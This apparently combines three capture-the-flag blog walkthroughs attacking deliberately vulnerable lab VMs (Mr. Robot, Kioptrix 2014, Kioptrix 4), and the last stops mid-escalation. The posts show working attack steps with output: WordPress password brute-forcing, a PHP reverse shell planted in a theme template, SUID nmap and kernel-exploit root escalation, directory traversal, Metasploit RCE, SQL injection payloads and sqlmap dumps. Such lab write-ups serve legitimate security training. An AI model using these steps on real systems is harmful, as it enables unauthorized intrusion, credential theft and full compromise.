Since I enjoy the show Mr.Robot, I had to try this VM out. Point of this game is to find 3 keys hidden in the VM. Link to download the VM can be located here . Lets get started!

Description from author:

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

The Attack

Kali Linux machine

 192.168.182.147 

Using the tool netdiscover, I found the victim VM to be 192.168.182.158

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Using nmap to do a version scan of the victim. Lets see what we find.

root@kali:~# nmap -sV 192.168.182.158

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-29 00:14 CDT
Nmap scan report for 192.168.182.158
Host is up (0.00033s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 00:0C:29:29:A5:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
root@kali:~# 

Looks like the victim is running Apache on ports 80/tcp and 443/tcp. Safe to assume that we will be pwning a web server. Lets do some further scanning on the victim using nikto to find any vulnerabilities on the system.

root@kali:~# nikto -h 192.168.182.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.158
+ Target Hostname:    192.168.182.158
+ Target Port:        80
+ Start Time:         2017-03-29 02:25:24 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-29 02:28:48 (GMT-5) (204 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

With nikto I was able to see that it was a WordPress site. I also see the /wp-login.php/, readme.html ,license.txt , and robots.txt files which look pretty interesting. Before we check these files, lets browse the web server and see what it gives us.

Well the server gives us a fancy intro and then gives us a message and a list of commands that we can run. None of them were that interesting but only the join command, where it asks for your email to “join” them. I didn’t put any email. Instead I looked into the files stated earlier. Lets check them out!

BINGO! Found the first key which turned out to be 073403c8a58a1f80d943455fb30724b9 and also a found file called fsocity.dic . Turns out to be a dictionary file. Maybe we will use this for later? For now lets save the file and continue on with the attack.

Key 1:

073403c8a58a1f80d943455fb30724b9

Well according to the readme.html file the victim is running WordPress Version 4.3.9 . I checked the liscense.txt file but found nothing of interest in there. Now lets check out /wp-login.php/ .

When viewing the page, I decided to see if there were any default username and passwords by inputting admin:admin ,but said the username was invalid. However, because of watching this show and knowing that the main character is elliot, I decided to input elliot as a username and password.

Looks like we are on to something! I got the password wrong however WordPress confirms that elliot is a username on the site. I will be doing a dictionary attack on the WordPress using the fsocity.dic which I acquired earlier. Before I do the dictionary attack, I will try make the password list smaller using the commands listed below. This will make the attack go faster when trying to acquire elliot’s password.

root@kali:~/Documents# wc -l fsocity.dic 
858160 fsocity.dic
root@kali:~/Documents# cat fsocity.dic | sort -u | wc -l
11451
root@kali:~/Documents# 
 cat fsocity.dic| sort -u | uniq > Newfsocity.dic 

I was able to cut the dictionary down from 858160 words to 11451 and saved the shorter dictionary file to Newfsociety.dic. Now lets use wpscan to get the elliot’s password.

root@kali:~# wpscan --url 192.168.182.158 --wordlist /root/Documents/Newfsocity.dic --username elliot
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.182.158/
[+] Started: Wed Mar 29 02:07:39 2017

[+] robots.txt available under: 'http://192.168.182.158/robots.txt'
[!] The WordPress 'http://192.168.182.158/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.182.158/xmlrpc.php

[+] WordPress version 4.3.9 identified from rss generator

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  Brute Forcing 'elliot' Time: 00:02:02 <====================================                                      > (5634 / 11452) 49.19%  ETA: 00:02:07
  [+] [SUCCESS] Login : elliot Password : ER28-0652


  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Wed Mar 29 02:09:43 2017
[+] Requests Done: 5694
[+] Memory used: 29.953 MB
[+] Elapsed time: 00:02:04
root@kali:~/Downloads# 

Nice! Elliot’s password is ER28-0652. Now lets log in.


It worked! There are many things I can do from here like check which plugins installed are vulnerable so we can exploit them, but since elliot is the Administrator, I am going to try to upload a php file to get a reverse shell.

Note: I got the php-reverse-shell from pentestmonkey. The link to file can be located here. Also, before uploading the file, make sure to edit the ip variable and port variable. In my case my IP is 192.168.182.147 and the port I will use is 1234 .

With that done lets upload the file!

Well looks like WordPress is set up to block my php file from uploading. They probably have the wp-config.php set up this way. Its all good, I still have another trick up my sleeve. Lets edit one of the pages and put our code from the reverse-shell-php file instead. Go to Appearance -> Editor -> 404.Template. Add the code to the bottom and click update file. Should look like the picture below.

Now set up the listener to catch the reverse shell.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

We have the listener set up and ready to go. Now I am going to use curl in order to get reverse shell to run and return us a shell to our listener.

Used to get reverse-shell going

root@kali:~# curl http://192.168.182.158/404.php

On the listener side

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
192.168.182.158: inverse host lookup failed: Unknown host
connect to [192.168.182.147] from (UNKNOWN) [192.168.182.158] 41061
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 05:14:30 up  4:25,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ whoami
daemon
$ hostname
linux
$ 

Got a shell back with the user daemon. Lets see if we can spawn a tty shell. Netsec has a good blog on helping with that. I recommend you all check him out. His blog on spawing a tty shell can be located here .
Used code below to spawn a tty shell.

python -c 'import pty; pty.spawn("/bin/sh")'

With that I snooped around and found in the /home/robot/ directory key 2 but got permission denied. I would have to be robot user (or root) to view it. However I did find a password.raw-md5 file. Maybe this might be a password to log in as robot? Lets open the file up.

$ ls
ls
key-2-of-3.txt	password.raw-md5
$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
$ 

BINGO! I have the password hash for robot. I used crackstation.net to crack the password which revealed to be abcdefghijklmnopqrstuvwxyz . Alright lets log in as robot.

$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
whoami
robot
$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ 

Now that we are logged in as robot lets get our 2nd key.

$ pwd
pwd
/home/robot
$ ls  
ls
key-2-of-3.txt	password.raw-md5
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
$ 

2nd Key:

822c73956184f694993bede3eb39f959

Got our 2nd key. Now lets try to get root now! Lets try to find any files that have the SUID bit set.

$  find / -perm -4000 2>/dev/null
 find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ 

Well looks like we can run nmap as root since it has the SUID binary set. Lets check the version of nmap to see if it still supports interactive mode.

$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
$ 

Nmap is running version 3.81 which means we can run nmap in interactive mode. We can use this to execute shell commands and get a root shell. Found a useful post that is helpful called Why You Can’t Un-Root a Compromised Machine .
Check it out. It’s very helpful. Now lets get our root shell and our last key.

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# whoami
whoami
root
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# 

We got root shell! Lets go to the root directory and get our last key.

# cd /root
cd /root
# ls
ls
firstboot_done	key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Key 3:

04787ddef27c3dee1ee161b21670b4e4

Conclusion

Well there you go, I got all 3 keys and root shell to our victim vm. Had fun with this one since it dealt with Mr. Robot, which is a really cool show. Recommend to anyone that is interested in watching it. That’s it for now. Till next time!

Part 5 of 5 of the kioptrix series! This a boot2root or for those that are not familiar with that term, the point of the game is to get root shell. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Link to downloading the Vm can be found here. Now lets get started!

Description from author:

Note from VulnHub

100% works with VMware player6, workstation 10 & fusion 6.

May have issues with ViritualBox If this is the case, try this ‘fix’: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip – Step by Step screenshots for Virtualbox 4.3 & VMware Workstation 9)
About the VM

As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.

Also, before powering on the VM I suggest you remove the network card and re-add it. For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go.

This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms.

Kioptrix VM 2014 download 825Megs

MD5 (kiop2014.tar.bz2) = 1f802308f7f9f52a7a0d973fbda22c0a

SHA1 (kiop2014.tar.bz2) = 116eb311b91b28731855575a9157043666230432

Waist line 32″

p.s.: Don’t forget to read my disclaimer…

Works out of the box with VMware workstation 10, player 6, fusion 6 (Can edit the vmx file to force a downgrade for an older version – see ‘kiop2014_fix.zip’). Has been known to work with Virtualbox 4.3 or higher… First thing: try setting it to a x64 machine. Then check: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip.

The Attack

Kali Linux machine

 192.168.182.147 

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.155

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Have the IP of the victim. Now time to run nmap.

root@kali:~# nmap -sS -A -T4 192.168.182.155

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-19 20:08 CDT
Nmap scan report for 192.168.182.155
Host is up (0.00043s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   closed ssh
80/tcp   open   tcpwrapped
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   tcpwrapped
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
MAC Address: 00:0C:29:4A:09:D7 (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.182.155

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.71 seconds
root@kali:~#

Found that the victim has ports 80 and port 8080 open with Apache/2.2.21 running on the victim. Also as well it looks that the victim is running FreeBSD. Lets see what’s on the victim’s website.



When browsing the site, all it showed was It works! When checking the page source however, I was to find that the server is running a web app called pChart2.1.3. Looks like it has multiple vulnerabilities listed on the exploit database located here. One which we are going to do is the directory traversal. More info on the directory traversal from the OWASP site can be located here —> Path Traversal and
Testing Directory traversal.


Also, what I found interesting was when I browsed the server but on port 8080, it said I was forbidden. Maybe this info might useful later on. Well for now we have enough info, lets exploit this VM.

Exploitation

We will be exploiting pChart 2.1.3 web app trying directory traversal. Inputting the URL below I will see if I can get the victim to display the /etc/passwd file. This will check if the victim is vulnerable to a directory traversal attack . If it is then I should get the info the the /etc/passwd file. Note: All I did was add ?Action=View&Script=%2f..%2f..%2fetc/passwd to the URL(after index.php). Looking at the info in the exploit database(exploit 31173) helps as well.

http://192.168.182.155/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

Looks like it is vulnerable and we got our file. There is a mysql user and an ossec user. Looks like the victim has a host intrusion detection system. Just some interesting info but lets move on to our exploitation. We need to find a way to in.

Lets see what we know. The victim is running FreeBSd and is running Apache/2.2.21 . Lets check the config files for the apache server and see what we get. Since this a FreeBSd operating system the config files for apache will be located in /usr/local/etc/apache22/httpd.conf.

Note: Just fyi for those of you wondering how I knew where exactly the apache config files were located. I didn’t. I did some online research and found a page where is showed how to set up Apache on FreeBSd, located here. This helped me find the location of the Apache config files.

The URL below is used to access the Apache config files. Lets see what we find.

http://192.168.182.155/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

There is abundance of information on this config file but if you keep looking to the bottom of the file, it shows some very valuable data.

Well look at this! The only way to access the web server on port 8080 is to set our user agent to Mozilla/4.0 . Lets try to access port 8080 by changing the agent. I used this guide to help me out called Changing User Agent in Firefox: A Step by Step Guide as well as this post HOWTO: Change User Agent in Firefox/Iceweasel. These guides helped a lot but I’ll show you all how I did it. I opened up Iceweasel and put about:config in the URL.

Next, it prompts us with warning but don’t worry, I know what I’m doing. Click on I’ll be careful, I promise!. Once in, Right-Click and go to New and then String . Enter the preference name general.useragent.override

It will then ask to enter a string value. Make sure to put Mozilla/4.0

When all is done it should look like the picture below.

Now lets access the server on port 8080 and see what it gives us.

Looks like there is a link called phptax. Lets check it out.

Looks like phptax is some sort of tax program and it’s vulnerable – phptax 0.8 – Remote Code Execution
. I also used searchsploit which also said phptax was vulnerable to a remote code execution attack.

root@kali:~# searchsploit phptax
------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                             |  Path
                                                                                           | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------- ----------------------------------
PhpTax pfilez Parameter Exec Remote Code Injection                                         | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution Vulnerability                                           | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution                       | ./php/webapps/25849.txt
------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~# 

Metasploit even has a module for it. Lets fire up metasploit for this attack.

root@kali:~# msfconsole

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                        http://metasploit.pro |
|______________________________________________________________________________|


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/http/phptax_exec 
msf exploit(phptax_exec) > show options

Module options (exploit/multi/http/phptax_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /phptax/         yes       The path to the web application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   PhpTax 0.8


msf exploit(phptax_exec) > set RHOST 192.168.182.155
RHOST => 192.168.182.155
msf exploit(phptax_exec) > set RPORT 8080
RPORT => 8080
msf exploit(phptax_exec) > run

[*] Started reverse TCP double handler on 192.168.182.147:4444 
[*] 192.168.182.1558080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo hVJmaYj76Ho5pii6;
[*] Writing to socket A
[*] Writing to socket B
[*] Command: echo 3T5yTlLQuaYzN6SB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from sockets...
[*] Reading from socket B
[*] Reading from socket B
[*] B: "hVJmaYj76Ho5pii6\r\n"
[*] B: "3T5yTlLQuaYzN6SB\r\n"
[*] Matching...
[*] Matching...
[*] A is input...
[*] A is input...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.155:26762) at 2017-03-20 00:00:40 -0500
[*] Command shell session 2 opened (192.168.182.147:4444 -> 192.168.182.155:58151) at 2017-03-20 00:00:40 -0500

id
uid=80(www) gid=80(www) groups=80(www)

Once in I spawned a tty shell using the command below. Then ran uname -a command to see what the victim was running.

/bin/sh -i
sh: can't access tty; job control turned off
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ 

The victim is currently running FreeBSD 9.0 which is vulnerable to Intel SYSRET Kernel Privilege Escalation.

Next I will download the exploit(on kali) and transfer the file using netcat. The code below sets up the listener

root@kali:~/Downloads# nc -lvp 1234 < exploit.c
listening on [any] 1234 ...

Changed directory to tmp and then connected to the attack machine and got the exploit.

$cd /tmp
$ nc -nv 192.168.182.147 1234 > exploit.c
Connection to 192.168.182.147 1234 port [tcp/*] succeeded!

Compiled and ran the exploit

gcc -o exploit expoit.c
chmod a+x exploit

Ran the exploit

./exploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!

id
uid=0(root) gid=0(wheel) groups=0(wheel)

Conclusion

Well this one took much more time then anticipated and was harder for me than it should've been but what you have to do is tough it out and "TRY HARDER"! That's it for the kioptrix series. I will work on more VMs on vulnhub in the future and might work on some write ups on the previous season of the National Cyber League since it's coming up in April. We'll see. If you guys have any ideas or enjoyed the read then leave a comment. Thanks for the read. Till next time!

Part 4 of 5 of the kioptrix series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Point of the game is to find a way to get root shell on the vulnerable machine. Link to downloading the Vm can be found here. Now lets get started!

NOTE: When extracting the VM. I was only given a vmdk (virtual machine disk) which gave me problems when trying to open it up with VMware. I used this guide called Create Workstation Virtual Machine Using Existing Virtual Disks to help me out.

Description from author:
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

1. It’s possible to get root remotely [ Edit: sorry not what I meant ]

1a. It’s possible to remotely compromise the machine

Stays within the target audience of this site

Must be “realistic” (well kinda…)

Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.

I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.

Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.

I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug

— A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version.

— Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com

Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.

Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys

So I hope you enjoy this one.

The Kioptrix Team

Source: http://www.kioptrix.com/blog/?p=604

**Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive**

The Attack

Kali Linux machine

 192.168.182.147 

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.154

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

I then ran a SYN stealth scan on the target and found ports 22, 80, 139, and 445 open!

root@kali:~# nmap -sS -n  192.168.182.154

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-12 19:38 CDT
Nmap scan report for 192.168.182.154
Host is up (0.00034s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:68:B2:1F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 157.82 seconds
root@kali:~#  

Since ports 139/tcp and 445/tcp are open lets enumerate SMB and check to see if there is any shares open as well as usernames using enum4linux. Much output came from using enum4linux however I only displayed the useful info below.

root@kali:~# enum4linux 192.168.182.154
 ========================================= 
|    OS information on 192.168.182.154    |
 ========================================= 
[+] Got OS info for 192.168.182.154 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.182.154 from srvinfo:
	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	4.9
	server type     :	0x809a03

 ================================ 
|    Users on 192.168.182.154    |
 ================================ 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
 ============================================ 
|    Share Enumeration on 192.168.182.154    |
 ============================================ 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))

	Server               Comment
	---------            -------
	KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.182.154
//192.168.182.154/print$	Mapping: DENIED, Listing: N/A
//192.168.182.154/IPC$	[E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

Found that the victim is running Samba 3.0.28a(no public exploits available) and got 5 usernames from the enumeration! It also attempted to map the shares print$ and IPC$ but it didn’t work. Lets try using dirb to scan the victims website.

root@kali:~# dirb http://192.168.182.154

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Mar 12 21:29:00 2017
URL_BASE: http://192.168.182.154/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.182.154/ ----
+ http://192.168.182.154/cgi-bin/ (CODE:403|SIZE:330)                                                                                                                                    
==> DIRECTORY: http://192.168.182.154/images/                                                                                                                                            
+ http://192.168.182.154/index (CODE:200|SIZE:1255)                                                                                                                                      
+ http://192.168.182.154/index.php (CODE:200|SIZE:1255)                                                                                                                                  
==> DIRECTORY: http://192.168.182.154/john/                                                                                                                                              
+ http://192.168.182.154/logout (CODE:302|SIZE:0)                                                                                                                                        
+ http://192.168.182.154/member (CODE:302|SIZE:220)                                                                                                                                      
+ http://192.168.182.154/server-status (CODE:403|SIZE:335)                                                                                                                               
                                                                                                                                                                                         
---- Entering directory: http://192.168.182.154/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                         
---- Entering directory: http://192.168.182.154/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Mar 12 21:29:03 2017
DOWNLOADED: 4612 - FOUND: 6
root@kali:~# 

Found some useful stuff including a /john/ directory.

So checking the website, it has a login. Lets see if it’s vulnerable to an SQL injection by putting a comma ' in the username and password fields.

Well look what we have here! It is vulnerable to SQLi!!

Exploitation

I will be using 2 ways to get 2 login credentials to the server. The first will be a manual SQL injection and the second will be using sqlmap. Both will yield the same results. Just wanted to let you all know just so you don’t get confused or anything. Lets get started!

Manual SQLi

Lets try to do an injection using one of the usernames from the SMB enumeration. I’m going to start with user john because I also found the john directory when using dirb. I will input john in the username field and 1' or '1'='1 in the password field. Now the SQL query will something like this in the back end:

SELECT * FROM users where username='john' and password='1' or '1'='1' 

It worked!! Got john’s credentials with the password being MyNameIsJohn

Did the same method with robert and got his credentials as well with his password being ADGAdsafdfwt4gadfga==
Note-You can skip to Escaping restricted shell to continue the pentest or go to SQLi using sqlmap to learn another method on how I got the credentials to the server.

SQLi using sqlmap

Well from output given from checking if the site was vulnerable to an SQLi and the checking the code from the login source below. It gives me enough info to perform an SQLi using sqlmap.

Using the command will give me the the databases running on the site.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL  --data="myusername=username&mypassword=password" --level=5 --risk=3  --dbs

We have 3 databases. Lets check out what the database members has to offer by giving us the tables in the database using the command below.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL  --data="myusername=username&mypassword=password" --level=5 --risk=3  --tables -D members

So the table in the database is members. Lets dump the info from the table and see what we get using the command below.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --data="myusername=username&mypassword=password"  -D members -T members --dump

BINGO!! We got 2 valid login credentials that I will use to ssh into the server.

Escaping restricted shell

root@kali:~# ssh john@192.168.182.154
john@192.168.182.154's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ 

As I log in, I noticed that I have a limited shell with only a few commands that I am allowed to run. Since I can run the command echo, I can easily “escape” and bypass the limited shell by using the command echo os.system('/bin/bash')

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ 

Privilege Escalation

Once out of limited shell, I ran several commands to see if I could find anything interesting.

john@Kioptrix4:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
